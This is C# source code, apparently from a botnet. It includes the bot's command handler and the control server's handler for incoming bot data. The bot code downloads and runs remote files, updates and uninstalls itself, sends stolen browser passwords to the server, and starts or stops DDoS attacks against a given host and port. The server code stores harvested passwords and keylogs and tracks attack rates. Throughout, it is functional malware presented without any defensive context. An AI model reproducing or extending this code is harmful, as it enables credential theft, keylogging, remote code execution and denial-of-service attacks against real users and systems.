bool SendPacket(BOT_PACKET Packet, string strArguments)
{
try
{
return(m_ClientSocket.SendPacket(m_ClientSocket.CreatePacket((byte)Packet, strArguments)));
}
catch { }
return(false);
}
void m_ClientSocket_OnClientReceiveData(BOT_PACKET Packet, byte[] arr_bArguments)
{
string[] arr_strArguments = null;
if (arr_bArguments != null)
{
arr_strArguments = UnicodeEncoding.Unicode.GetString(arr_bArguments, 0, arr_bArguments.Length).Split('|');
}
switch (Packet)
{
case BOT_PACKET.TASK:
{
/*
* arr_bArguments[1] = Task
* arr_bArguments[2...] = Parameters
*/
//BOT_TASK Task = (BOT_TASK)arr_bArguments[0];
int iTaskID = -1;
if (!int.TryParse(arr_strArguments[0], out iTaskID))
{
break;
}
int iTask = -1;
if (!int.TryParse(arr_strArguments[1], out iTask))
{
break;
}
BOT_TASK Task = (BOT_TASK)iTask;
string strParameters = arr_strArguments[2];
string[] arr_strParameters = null;
if (!string.IsNullOrEmpty(strParameters))
{
arr_strParameters = strParameters.Split(' ');
}
switch (Task)
{
case BOT_TASK.DOWNLOAD_EXECUTE:
{
if (arr_strParameters.Length != 1)
{
break;
}
if (CUtils.DownloadFile(arr_strParameters[0]))
{
this.SendTaskExecuted(iTaskID);
}
}
break;
case BOT_TASK.UPDATE:
{
if (arr_strParameters.Length != 1)
{
break;
}
if (CUtils.DownloadFile(arr_strParameters[0]) && CMalwareStartup.UninstallBot())
{
this.SendTaskExecuted(iTaskID);
Application.Exit();
Environment.Exit(0);
}
}
break;
case BOT_TASK.UNINSTALL:
{
if (CMalwareStartup.UninstallBot() && this.SendTaskExecuted(iTaskID))
{
Application.Exit();
Environment.Exit(0);
}
}
break;
case BOT_TASK.STEALER:
{
if (this.SendPacket(BOT_PACKET.STEALER, CPasswordStealer.GetPasswords()))
{
this.SendTaskExecuted(iTaskID);
}
}
break;
default: break;
}
}
break;
case BOT_PACKET.DDOS:
{
if (arr_strArguments == null ||
arr_strArguments.Length != 1 && arr_strArguments.Length != 6 && arr_strArguments.Length != 7)
{
break;
}
/*
* [0] = ID
* [1] = Host
* [2] = Port
* [3] = Type
* [4] = Hours
*/
int iAttackID;
if (!int.TryParse(arr_strArguments[0], out iAttackID))
{
break;
}
if (arr_strArguments.Length > 1)
{
int iPort, iType, iInterval, iSockets;
if (!int.TryParse(arr_strArguments[2], out iPort) ||
!int.TryParse(arr_strArguments[3], out iType) ||
!int.TryParse(arr_strArguments[4], out iSockets) ||
!int.TryParse(arr_strArguments[5], out iInterval))
{
break;
}
DateTime?EndDate = null;
if (arr_strArguments.Length == 7)
{
double dHours = -1;
if (!double.TryParse(arr_strArguments[6], out dHours))
{
break;
}
EndDate = DateTime.Now;
EndDate = EndDate.Value.AddHours(dHours);
}
if (CDDoSHandler.StartAttack(iAttackID, iType, arr_strArguments[1], iPort, EndDate, iSockets, iInterval))
{
this.SendDdosStarted(iAttackID);
}
}
else
{
CDDoSHandler.StopAttack(iAttackID);
}
}
break;
case BOT_PACKET.PING:
this.SendPacket(BOT_PACKET.PING, string.Format(
"{0}",
CUtils.GetCPUUsage()
));
break;
default: break;
}
}
/// <summary>
/// Handles received Data from Clients that have been identified as Bot.
/// </summary>
/// <param name="Bot"></param>
/// <param name="Packet"></param>
/// <param name="arr_strArguments"></param>
void HandleBotPacket(CBot Bot, BOT_PACKET Packet, String[] arr_strArguments)
{
try
{
switch (Packet)
{
case BOT_PACKET.TASK:
{
if (arr_strArguments == null || arr_strArguments.Length != CConstants.BOT_TASKEXECUTED_ARGUMENT_LENGTH)
{
break;
}
int iTaskID = -1;
if (!int.TryParse(arr_strArguments[0], out iTaskID))
{
break;
}
m_TaskHandler.SetTaskExecuted(Bot, iTaskID);
}
break;
case BOT_PACKET.DDOS:
{
if (arr_strArguments == null || arr_strArguments.Length != 1 && arr_strArguments.Length != 3)
{
break;
}
int iAttackID = -1;
if (!int.TryParse(arr_strArguments[0], out iAttackID))
{
break;
}
if (arr_strArguments.Length > 1)
{
int iRate, iPPS;
if (!int.TryParse(arr_strArguments[1], out iRate) ||
!int.TryParse(arr_strArguments[2], out iPPS))
{
break;
}
m_DdosHandler.InfoUpdate(Bot.BotClient, iAttackID, iPPS, iRate);
}
else
{
m_DdosHandler.SetExecutedByBot(Bot.BotClient, iAttackID);
}
}
break;
case BOT_PACKET.PING:
{
if (arr_strArguments == null || arr_strArguments.Length != 1)
{
break;
}
int iCPUUsage = -1;
if (!int.TryParse(arr_strArguments[0], out iCPUUsage))
{
break;
}
Bot.CPU_Usage = iCPUUsage;
Bot.LastPong = DateTime.Now;
m_BotHandler.ReplaceBySocket(Bot.BotClient, Bot);
}
break;
case BOT_PACKET.STEALER:
{
if (arr_strArguments == null || arr_strArguments.Length != 1)
{
break;
}
var arr_strPasswords = arr_strArguments[0].Split(';');
foreach (var strPassword in arr_strPasswords)
{
var arr_strData = strPassword.Split('*');
if (arr_strData.Length != 4)
{
break;
}
CStealerManager.Add(arr_strData[0], arr_strData[1], arr_strData[2], arr_strData[3]);
}
}
break;
case BOT_PACKET.KEYLOGS:
{
if (arr_strArguments == null || arr_strArguments.Length != 1)
{
break;
}
var arr_strLogData = UnicodeEncoding.Unicode.GetString(Convert.FromBase64String(arr_strArguments[0])).Split('*');
if (arr_strLogData.Length != 2)
{
break;
}
CKeylogManager.Add(arr_strLogData[0], arr_strLogData[1], Bot.BotID);
}
break;
default: break;
}
}
catch { }
}
